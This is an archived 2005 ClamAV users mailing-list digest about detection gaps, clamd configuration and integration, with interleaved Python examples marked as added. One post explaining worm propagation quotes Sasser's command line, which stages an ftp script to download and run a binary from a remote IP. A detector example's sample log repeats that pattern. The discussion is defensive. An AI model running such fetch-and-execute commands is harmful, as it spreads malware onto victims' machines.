Re: [Clamav-users] undetected malwares
--- Michel Arboi [EMAIL PROTECTED] wrote:
> http://passoire.hd.free.fr/malware/
> All those malwares are not detected by ClamAV. They were automatically fetched by TFTP from infected machines when they tried to attack my IP.

Hi Michel,

How did those machines get infected in the first place, and what do you mean by IP? IP address? What do you mean by attack here? Do you mean that the infected machines try to tftp malware to your machine? I am just trying to understand how the malware spread.

> Some files might be broken, as TFTP is not a very reliable protocol. I removed duplicated files and truncated files. Hope this helps.

___
http://lurker.clamav.net/list/clamav-users.html
[Clamav-users] Can ClamAV detect this ?
Can the current ClamAV scan .eml and .nws file types? http://www.malware.com/index2.html
Re: [Clamav-users] Can ClamAV detect this ?
* Joanna Roman [EMAIL PROTECTED] [20050609 09:34] wrote:
> Can the current ClamAV scan .eml and .nws file types? http://www.malware.com/index2.html

5 years down the line, you still think Microsoft has not fixed those issues, correct? Tell us if you tested the outlined procedures and they work on your PC, which is running the latest service pack for its version???

Also, please remember that ClamAV is not a desktop malware scanner by design.

Also, I may be naive, but I don't categorise whatever is on that page as malware ;)

-Wash
http://www.netmeister.org/news/learn2quote.html
--
Odhiambo Washington [EMAIL PROTECTED] | Wananchi Online Ltd. www.wananchi.com
A rock pile ceases to be a rock pile the moment a single man contemplates it, bearing within him the image of a cathedral. -- Antoine de Saint-Exupery
Re: [Clamav-users] Can ClamAV detect this ?
--- Odhiambo Washington [EMAIL PROTECTED] wrote:
> [snip]

I am just asking in general. So do you know what malware ClamAV can detect right now?
Re: [Clamav-users] Can ClamAV detect this ?
* Joanna Roman [EMAIL PROTECTED] [20050609 09:49] wrote:
> [snip]
> I am just asking in general. So do you know what malware ClamAV can detect right now?

Yes, I know. They are all in main.cvd and daily.cvd. If you want to find out which one, use:

sigtool -l /usr/local/share/clamav/main.cvd | grep whatever..
sigtool -l /usr/local/share/clamav/daily.cvd | grep whatever..

yeah?

-Wash
http://www.netmeister.org/news/learn2quote.html
--
Odhiambo Washington [EMAIL PROTECTED] | Wananchi Online Ltd. www.wananchi.com
No man in the world has more courage than the man who can stop after eating one peanut. -- Channing Pollock
[Clamav-users] Recent CVS - broken logging to /dev/stderr ?
Hi list,

Is it just me, or have the recent CVS changes around the logg() function broken logging to /dev/stderr? It would appear that maybe privileges are being dropped too quickly, because with today's CVS I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on CVS from a few days ago.

Steve
Re: [Clamav-users] Re: Worm.Mytob
Samuel Benzaquen wrote:
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of René Berber
> Sent: Wednesday, June 08, 2005 4:00 PM
> To: clamav-users@lists.clamav.net
> Subject: [Clamav-users] Re: Worm.Mytob
>
> Pavel R. Levashov wrote:
> > I have a mail server (sendmail on RedHat 7.3) with clamav antivirus (clamd version 0.85.1, clamav-milter version 0.85). Clamd updates its antivirus bases regularly; clamav-milter catches all viruses except one: Worm.Mytob. This virus is transparent for clamav-milter. The surprise is that ClamWin 0.85.1 on Windows XP finds this virus at once. Could you give me a piece of advice on what the reason for such behavior is? Below are pieces of log files on RedHat Linux 7.3 from freshclam.log:
> > --
> > Received signal: wake up
> > ClamAV update process started at Wed Jun 8 22:33:09 2005
> > main.cvd is up to date (version: 32, sigs: 34720, f-level: 5, builder: tkojm)
> > daily.cvd is up to date (version: 921, sigs: 753, f-level: 5, builder: diego)
> > --
>
> Are you using clamav-milter with or without clamd? If you are using it with clamd then you should add (uncomment really) NotifyClamd in your freshclam.conf. This may only solve the problem if clamd has been running a long time but not refreshing the database (since freshclam is not telling it to do it). Nevertheless, clamd's SelfCheck would have reloaded the new database if it has been written to the right directory. You can check the running version by sending the VERSION command to clamd's socket. You could be omitting some option in clamd's conf.
>
> Is it with all Mytob sigs or some specific sigs?
>
> -Samuel

Thank you very much for your advice. The reason was a misconfiguration of the clamd daemon.

Best wishes,
Pavel Levashov
Re: [Clamav-users] Recent CVS - broken logging to /dev/stderr ?
Steve Brown wrote:
> It would appear that maybe privileges are being dropped too quickly because with today's cvs I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on cvs from a few days ago.

Unless I am very much mistaken, the perms on stderr should be 666.

Matt
RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Samuel Benzaquen
> Sent: Wednesday, June 08, 2005 5:21 PM
> To: ClamAV users ML
> Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko
>
> > -----Original Message-----
> > From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Scott Woodford
> > Sent: Wednesday, June 08, 2005 3:55 PM
> > To: 'ClamAV users ML'
> > Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko
> >
> > Tim, not a problem. Been a long day for me too, so I know how ya feel. I'd love to just replace that code and use it, but that doesn't seem to work for me. All I want is a message box popping up, telling the user that a virus was found. I've even tried VirusEvent echo %v, which is pretty simple, but that's not working either. I hate being a newbie.
>
> You could use xmessage to show a message in a window on X. For example:
>
> VirusEvent xmessage Virus found: %v
>
> I have not used xmessage for a long time, so you should read the man page for more customization.
>
> -Samuel

Ok, thanks to everyone on this list, I have gotten almost everything up and running perfectly. I really appreciate all of your help. I still have two problems:

1 - I cannot get Dazuko to start automatically every time the computer boots in RedHat 9.
2 - xmessage works great for the VirusEvent, but I can't figure out how to use a newline character to get the text to wrap. Otherwise, I wrote a Perl script that displays the VirusEvent message just fine, but I have no idea how to pass %v to it.

Thanks again for everything.
Re: [Clamav-users] Recent CVS - broken logging to /dev/stderr ?
On Thu, Jun 09, 2005 at 09:19:22AM +0100, Matt Fretwell said:
> Steve Brown wrote:
> > It would appear that maybe privileges are being dropped too quickly because with today's cvs I'm getting permission denied on /dev/stderr with perms = rw--- root.root. It was fine (and still is) on cvs from a few days ago.

Yes, that is the problem. This does however fix the problem of clamav opening all its descriptors (including the logfile) as root, breaking permissions for anything else that needs to write to the logfile. Try starting it as the user it runs as, e.g.,

su -c /usr/sbin/clamd - clamav

Probably the correct fix for this is to close all descriptors just before dropping privileges, and then reopen them after.

> Unless I am very much mistaken, the perms on stderr should be 666.

I doubt that - 0600 is much more reasonable. Why would you want your stderr stream (or root's) to be world writable? Some distros do use 640 $USER:tty, but I would be surprised if anybody sets it up as 666 by default.

--
Stephen Gran | [EMAIL PROTECTED] | http://www.lobefin.net/~steve
Woman was God's second mistake. -- Nietzsche
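The ordering Stephen describes (drop privileges first, then open or reopen the descriptors, so the log file is created and owned by the service user rather than root) can be shown in a few lines. The following is an added Python example, not ClamAV's code: the service user name, the log path and the helper names are hypothetical, and the demo runs as whatever user invokes it, which corresponds to the `su -c ... - clamav` case above.

```python
"""Open a daemon's log file only after dropping privileges.

Added example, not ClamAV code. It shows the ordering from the thread:
a descriptor opened as root before setuid() is a root-owned file that
the service user (and anything else) cannot write to, so the drop comes
first and the (re)open second. User name, path and helper names are hypothetical.
"""
import grp
import os
import pwd
import tempfile


def drop_privileges(user):
    """Become `user` if we are root. Returns the (uid, gid) in effect afterwards.

    Order matters: supplementary groups, then gid, then uid. Once setuid()
    has run we can no longer change groups.
    """
    if os.geteuid() != 0:
        # Already unprivileged (the "su -c ... - clamav" case): nothing to drop.
        return os.geteuid(), os.getegid()
    pw = pwd.getpwnam(user)
    extra = [g.gr_gid for g in grp.getgrall() if user in g.gr_mem]
    os.setgroups(sorted(set(extra + [pw.pw_gid])))
    os.setgid(pw.pw_gid)
    os.setuid(pw.pw_uid)
    return pw.pw_uid, pw.pw_gid


def open_log_after_drop(log_path, user=None):
    """Drop privileges first, then open (creating if needed) the log file.

    Returns (fd, owner_uid, mode) so the caller can confirm the file belongs
    to the service user rather than root.
    """
    if user is not None:
        drop_privileges(user)
    fd = os.open(log_path, os.O_WRONLY | os.O_CREAT | os.O_APPEND, 0o640)
    os.fchmod(fd, 0o640)  # the create mode above is subject to umask; pin it
    st = os.fstat(fd)
    return fd, st.st_uid, st.st_mode & 0o777


def log_writable(log_path):
    """Runtime check a daemon can do right after the drop, before daemonising."""
    return os.access(log_path, os.W_OK)


def demo():
    """Exercise the sequence on a scratch file and report what was observed."""
    workdir = tempfile.mkdtemp(prefix="clamd-log-demo-")
    log_path = os.path.join(workdir, "clamd.log")
    # user=None: stay as the current (assumed unprivileged) user, as with su -c.
    fd, owner, mode = open_log_after_drop(log_path, user=None)
    os.write(fd, b"LibClamAV: log opened after privilege drop\n")
    os.close(fd)
    with open(log_path, "rb") as f:
        content = f.read()
    return {
        "owner_is_us": owner == os.geteuid(),
        "mode": mode,
        "writable": log_writable(log_path),
        "content": content,
    }


if __name__ == "__main__":
    print(demo())
```

When the daemon really does start as root, `open_log_after_drop(path, user="clamav")` performs the drop before the `os.open`, so the file ends up owned by `clamav` with mode 0640 and nothing else has to be chowned afterwards.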
[Clamav-users] VirusEvent in clamd.conf
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Scott Woodford
> Sent: Thursday, June 09, 2005 9:27 AM
> To: 'ClamAV users ML'
> Subject: RE: [Clamav-users] ERROR: Clamuko: Can't register with Dazuko
>
> [snip]
>
> Ok, thanks to everyone on this list, I have gotten almost everything up and running perfectly. I really appreciate all of your help. I still have two problems:
>
> 1 - I cannot get Dazuko to start automatically every time the computer boots in RedHat 9.
> 2 - xmessage works great for the VirusEvent, but I can't figure out how to use a newline character to get the text to wrap. Otherwise, I wrote a Perl script that displays the VirusEvent message just fine, but I have no idea how to pass %v to it.
>
> Thanks again for everything.

Well, I got the VirusEvent problem figured out. I wrote a shell script that I call from VirusEvent, and it works great for the root account. Here it is:

Title: virus_notify.sh
Location: /usr/local/bin
**
#!/bin/sh
# Called from clamd.conf as: VirusEvent /usr/local/bin/virus_notify.sh %v
# $1 is the virus name that clamd substitutes for %v
message="\nVIRUS '$1' FOUND !!! Access to this file / directory has been denied.\nYou must contact the Administrator immediately. A note of this virus has been\nmade in the system logs."
if ! gdialog --title 'VIRUS FOUND !!!' --msgbox "$message" 10 10; then
    sleep 10
    exit 1;
fi
**

I call it from the VirusEvent line in clamd.conf like this:

VirusEvent "/usr/local/bin/virus_notify.sh %v"

(without quotes, obviously). The problem now is that this message only gets displayed when the root account finds a virus. If I log in as a regular user, then it just denies access to the file and gives an error, rather than showing me the virus notification message. I'm not sure if the variable AllowSupplementaryGroups in clamd.conf has anything to do with it, but either way I have enabled that. Any ideas?
[Clamav-users] Mytob.dj (or some variant) apparently not detected by Clam
It appears the last round of mails sent by Mytob.dj (or a close variant) are not being detected in the current sigs (921). I'm going by the description here:

http://securityresponse.symantec.com/avcenter/venc/data/[EMAIL PROTECTED]

As of last night I only had bounces for samples, and submitted one that was mostly a complete mail (missing just an initial Received: line and a Return-Path:). I added procmail rules based on that and now have complete samples, one of which I submitted a little while ago. I've attached the procmail rules I'm using to catch any that make it past Clam.

==
Chris Candreva -- [EMAIL PROTECTED] -- (914) 967-7816
WestNet Internet Services of Westchester
http://www.westnet.com/

:0 B
* < 5000
* ^<html> +$<body> +$<BR><STRONG>Dear Valued Member, </STRONG><BR>
$VirusFolder

:0 B
* < 5000
* ^<BR><a href=http://[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+/confirm.php?email=
$VirusFolder
[Clamav-users] How does ClamAV classify Worm and Trojan ?
When someone submits a virus sample (in the format of an email, exe file, *.hml file), what criteria does the ClamAV team use to classify the virus sample as Worm or Trojan?
[Clamav-users] zip error
Hi people,

Recently I upgraded clamav to version 0.85-1, but I have problems with zips with passwords. The clamav log is:

/home/ricardo/BAK_SIQUEIRA_EADV_05-05-23.zip: Zip module failure ERROR

and I need to solve it. Any suggestions? The zip file is located at http://200.161.4.170/zip

Thanks
Marcos
Re: [Clamav-users] undetected malwares
On 6/9/05, Joanna Roman [EMAIL PROTECTED] wrote:
> What do you mean by attack here? Do you mean that the infected machines try to tftp malware to your machine? I am just trying to understand how the malware spread.

There are several possibilities for how malware can hook your system:

- mail worms; the problem is in front of the computer, clicking instead of thinking.
- browser exploits; they use a flaw in your web browser to execute a command and install malicious code.
- backdoors that mail worms leave behind, such as mydoom or bagle; you can connect to them and upload code.
- remotely exploitable vulnerabilities; you can get a command shell on the remote system, without any user interaction, and download and execute code.
- others (weak passwords on shares, britney_spears_nude.jpg.exe on kazaa ...)

To use remotely exploitable vulnerabilities, the viruses have to 'scan' for vulnerable machines, meaning they try to connect to a machine on the port running the vulnerable service, and send the malicious packets (shellcode). There are several things a shellcode can do. It can crash the machine, but that does not help the virus to spread, as it has to try to send a copy of itself to the victim's machine. So the virus runs a little http, ftp or tftp server, serving only itself, and it tells the victim to download it by creating a Windows command shell, which it uses to download itself via tftp or ftp, as Windows offers a tftp and ftp client by default. If the file is served via http, the shellcode has to make use of a winapi call like downloadurl() or something like that, as there is no command-line tool to download files via http on Windows.

Example: this is used by the sasser virus. It opens an ftp server on port 5554 and asks the victims to download it from this port.

echo off&echo open 123.45.67.89 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo user&echo bin>>cmd.ftp&echo get 13108_up.exe>>cmd.ftp&echo bye>>cmd.ftp&echo on&ftp -s:cmd.ftp&13108_up.exe&echo off&del cmd.ftp&echo on

This creates a file cmd.ftp with the content

open 123.45.67.89 5554
anonymous
bin
get 13108_up.exe

and runs the ftp.exe program with the file as input:

ftp -s:cmd.ftp

It then starts the downloaded file 13108_up.exe and deletes the file 'cmd.ftp':

del cmd.ftp

After successful transmission, it starts the binary on the remote computer; the transferred virus will install itself as a system service, create some registry keys, and scan for other vulnerable machines. Often viruses can exploit more than one weakness, to increase their chances.

To defend yourself ... patch your system, run a firewall (even better, run a router), run an av scanner, think before clicking.
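From the defender's side, the bootstrap sequence the post describes (a script staged with echo, executed with ftp -s: or tftp GET, then the fetched file launched a few seconds later) leaves a recognisable trail in process-creation logs. The following is an added Python example, not from the original post: the "time host command-line" log format and the sample lines are constructed, and every host name, IP and file name in them is a placeholder.

```python
"""Flag the staged ftp/tftp download pattern in process-creation logs.

Added example, not from the original post. The log format below is a
constructed "<ISO time> <host> <command line>" and every host, IP and file
name in SAMPLE_LOG is made up; the patterns come from the sequence the post
describes (echo lines staged into a script, ftp -s:<script> or tftp GET,
then the fetched file executed).
"""
import re
from collections import namedtuple
from datetime import datetime

Alert = namedtuple("Alert", "host time kind detail")

# Constructed sample input.
SAMPLE_LOG = """\
2005-06-09T10:01:02 ws01 cmd.exe /c echo open 10.0.0.5 5554>>cmd.ftp&echo anonymous>>cmd.ftp&echo bin>>cmd.ftp&echo get 13108_up.exe>>cmd.ftp&echo bye>>cmd.ftp&ftp -s:cmd.ftp&13108_up.exe&del cmd.ftp
2005-06-09T10:01:03 ws01 ftp -s:cmd.ftp
2005-06-09T10:01:09 ws01 13108_up.exe
2005-06-09T10:05:00 ws02 tftp -i 10.0.0.7 GET svchost32.exe
2005-06-09T10:05:01 ws02 svchost32.exe
2005-06-09T11:00:00 ws03 ftp ftp.example.com
2005-06-09T11:00:05 ws03 notepad.exe readme.txt
"""

# ftp driven by a script file: "ftp -s:cmd.ftp" (possibly with other switches first)
FTP_SCRIPT = re.compile(r"\bftp(?:\.exe)?\s+(?:-\S+\s+)*-s:([^\s&|]+)", re.I)
# tftp fetch of a file from a bare IP: "tftp -i 10.0.0.7 GET name"
TFTP_GET = re.compile(
    r"\btftp(?:\.exe)?\s+(?:-i\s+)?(\d{1,3}(?:\.\d{1,3}){3})\s+get\s+([^\s&|]+)", re.I)
# the "get <file>" line being echoed into a script tells us what will be fetched
STAGED_GET = re.compile(r"\becho\s+get\s+([^\s>&|]+)\s*>>?\s*\S+", re.I)


def _parse(line):
    ts, host, cmd = line.split(" ", 2)
    return datetime.fromisoformat(ts), host, cmd


def _first_token(cmd):
    """Program name of a command line: strip path and quotes, lower-case."""
    tok = cmd.strip().split()[0].strip('"')
    return tok.replace("\\", "/").rsplit("/", 1)[-1].lower()


def detect(log_text, window_seconds=60):
    """Return Alerts for download staging and for the fetched file being run."""
    alerts = []
    pending = {}  # host -> [(time, file name a download was staged for)]
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, host, cmd = _parse(line)
        m = TFTP_GET.search(cmd)
        if m:
            alerts.append(Alert(host, ts, "tftp-get", m.group(2)))
            pending.setdefault(host, []).append((ts, m.group(2).lower()))
        m = FTP_SCRIPT.search(cmd)
        if m:
            alerts.append(Alert(host, ts, "ftp-script", m.group(1)))
        for m in STAGED_GET.finditer(cmd):
            alerts.append(Alert(host, ts, "staged-ftp-get", m.group(1)))
            pending.setdefault(host, []).append((ts, m.group(1).lower()))
        # Correlation: the file a download was staged for runs shortly afterwards.
        prog = _first_token(cmd)
        for when, name in pending.get(host, []):
            if name == prog and 0 <= (ts - when).total_seconds() <= window_seconds:
                alerts.append(Alert(host, ts, "fetched-binary-executed", name))
    return alerts


def hosts_with_execution(alerts):
    """Hosts where a staged download was followed by running the fetched file."""
    return sorted({a.host for a in alerts if a.kind == "fetched-binary-executed"})


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(a.time.isoformat(), a.host, a.kind, a.detail)
```

The single-line matches (`ftp-script`, `tftp-get`, `staged-ftp-get`) are noisy on their own, since administrators also script ftp; the correlated `fetched-binary-executed` alert, where the very file named in the staged script runs on the same host inside the window, is the one worth paging on. ws03's interactive ftp session and notepad produce nothing.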
Re: [Clamav-users] zip error
Hi,

On Friday 10 June 2005 05:09, Marcos Dutra wrote:
> Recently I upgraded clamav to version 0.85-1 but I have problems with zips with passwords. The clamav log is /home/ricardo/BAK_SIQUEIRA_EADV_05-05-23.zip: Zip module failure ERROR, and I need to solve it. Any suggestions? The zip file is located at http://200.161.4.170/zip

AES encrypted ZIP files use a compression method id that is not recognized by ClamAV 0.85.1. This is a known problem and it has already been fixed in CVS.

Regards,
David Majorel
[Clamav-users] ClamAV integration notes
hi

i'm currently analyzing integration of ClamAV into a sort of content management system that we have. among other things users can upload and download files to it, so there's a need to do virus scanning on the files. my initial idea is to run a virus scan for each file upload and then do periodic scanning for all files, perhaps once a month, so that files containing viruses which aren't known to ClamAV at upload time are also caught at some point. i'm planning on running clamd in the background and using the TCP socket based API to command clamd to do the scanning.

i've been experimenting a little with the integration with ClamAV v0.85.1 and here are some questions and comments:

- with the TCP API clamd closes the socket when it finishes. how do i determine whether the clamd scan was successfully finished or that the server has died unexpectedly during the scan?
- the TCP API doesn't seem to provide the same level of parameterization. it would be nice to be able to use some of the clamscan parameters such as --exclude, --include etc. with the API.
- the TCP API only seems to report FOUND or ERROR as return status for each file. it would be good to also give the full return code per file similar to clamscan.
- what does clamd report if a file is not scanned due to a clamd config option such as ArchiveMaxFileSize, ArchiveMaxRecursion, ArchiveMaxFiles or MaxDirectoryRecursion? does clamd report the decision to skip files or directories in some way?

br. aspa
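For the first and third points above (telling a daemon that died mid-scan apart from a finished scan, and turning the per-file OK/FOUND/ERROR lines into a clamscan-style code), here is an added Python example that is not ClamAV's code. It assumes clamd listens on 127.0.0.1:3310, accepts a newline-terminated "SCAN <path>" and replies with one "<path>: <verdict>" line per file before closing the connection; the sample replies at the bottom are constructed, not captured from a daemon.

```python
"""Talk to clamd over its TCP socket and turn its replies into clamscan-style codes.

Added example, not ClamAV code. Assumptions: clamd listens on 127.0.0.1:3310,
takes a newline-terminated "SCAN <path>" and answers with one line per file of
the form "<path>: OK", "<path>: <signature> FOUND" or "<path>: <reason> ERROR",
then closes the socket. The replies in the demo are constructed, not captured.
"""
import socket

# clamscan's exit codes (0 clean, 1 infected, 2 error) plus one of our own for
# "the daemon went away before giving every file a verdict".
CLEAN, INFECTED, ERROR, INCOMPLETE = 0, 1, 2, 3


def clamd_command(command, host="127.0.0.1", port=3310, timeout=60):
    """Send one command and read until clamd closes the connection."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(command.encode() + b"\n")
        chunks = []
        while True:
            buf = s.recv(4096)
            if not buf:
                break
            chunks.append(buf)
    return b"".join(chunks)


def parse_reply(data):
    """Parse reply bytes into ({path: (code, detail)}, trailing_fragment).

    Only newline-terminated lines count as verdicts; a trailing fragment means
    the connection was cut in the middle of a line.
    """
    verdicts = {}
    text = data.decode("utf-8", "replace")
    complete, _, tail = text.rpartition("\n")
    for line in complete.split("\n"):
        # first ": " splits path from verdict; error reasons may themselves contain ": "
        path, sep, rest = line.strip().partition(": ")
        if not sep:
            continue  # not a verdict line (e.g. a VERSION banner)
        if rest == "OK":
            verdicts[path] = (CLEAN, "")
        elif rest.endswith(" FOUND"):
            verdicts[path] = (INFECTED, rest[:-len(" FOUND")])
        elif rest.endswith(" ERROR"):
            verdicts[path] = (ERROR, rest[:-len(" ERROR")])
    return verdicts, tail


def scan_outcome(data, expected_paths):
    """Overall code for a batch, plus per-file verdicts and paths with no verdict."""
    verdicts, tail = parse_reply(data)
    missing = [p for p in expected_paths if p not in verdicts]
    if tail or missing:
        return INCOMPLETE, verdicts, missing
    codes = [code for code, _ in verdicts.values()]
    if ERROR in codes:
        return ERROR, verdicts, missing
    if INFECTED in codes:
        return INFECTED, verdicts, missing
    return CLEAN, verdicts, missing


def scan_paths(paths, host="127.0.0.1", port=3310):
    """One SCAN per path against a live clamd; needs a running daemon."""
    data = b"".join(clamd_command("SCAN " + p, host, port) for p in paths)
    return scan_outcome(data, paths)


# Constructed replies for an offline demo (the ERROR text is the one quoted
# elsewhere in this thread for an unsupported zip).
PATHS = ["/srv/upload/a.doc", "/srv/upload/b.exe"]
REPLY_CLEAN = b"/srv/upload/a.doc: OK\n/srv/upload/b.exe: OK\n"
REPLY_FOUND = b"/srv/upload/a.doc: OK\n/srv/upload/b.exe: Eicar-Test-Signature FOUND\n"
REPLY_ERROR = b"/srv/upload/c.zip: Zip module failure ERROR\n"
REPLY_DIED_MIDLINE = b"/srv/upload/a.doc: OK\n/srv/upload/b.exe: Eicar-Te"
REPLY_DIED_BETWEEN = b"/srv/upload/a.doc: OK\n"

if __name__ == "__main__":
    for name, reply, paths in [("clean", REPLY_CLEAN, PATHS), ("found", REPLY_FOUND, PATHS),
                               ("error", REPLY_ERROR, ["/srv/upload/c.zip"]),
                               ("died mid-line", REPLY_DIED_MIDLINE, PATHS),
                               ("died between files", REPLY_DIED_BETWEEN, PATHS)]:
        print(name, scan_outcome(reply, paths))
```

The trick for the "did clamd die?" question is that the client knows which paths it asked about: a clean close with every expected path carrying a verdict is a finished scan, while a missing path or a half line means the daemon (or the connection) went away, and the batch is retried rather than treated as clean. The same holds for CONTSCAN of a directory if the client enumerates the files itself before sending the command.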